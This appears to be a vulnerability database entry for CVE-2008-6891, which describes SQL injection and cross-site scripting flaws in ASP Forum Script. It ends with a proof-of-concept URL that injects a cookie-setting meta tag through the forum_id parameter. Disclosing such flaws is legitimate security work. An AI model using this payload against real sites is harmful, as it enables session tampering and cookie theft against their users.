[] NeoSense

ASP Forum Script - 'new_message.asp?forum_id' Cross-Site Scripting

Author: Pouya_Server
type: webapps
platform: php
port: 
date_added: 2008-12-01 
date_updated: 2014-04-01 
verified: 1 
codes: CVE-2008-6891;OSVDB-56735 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/32571/info

ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/[Path]/new_message.asp?topic_id=0&message_id=0&forum_id=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>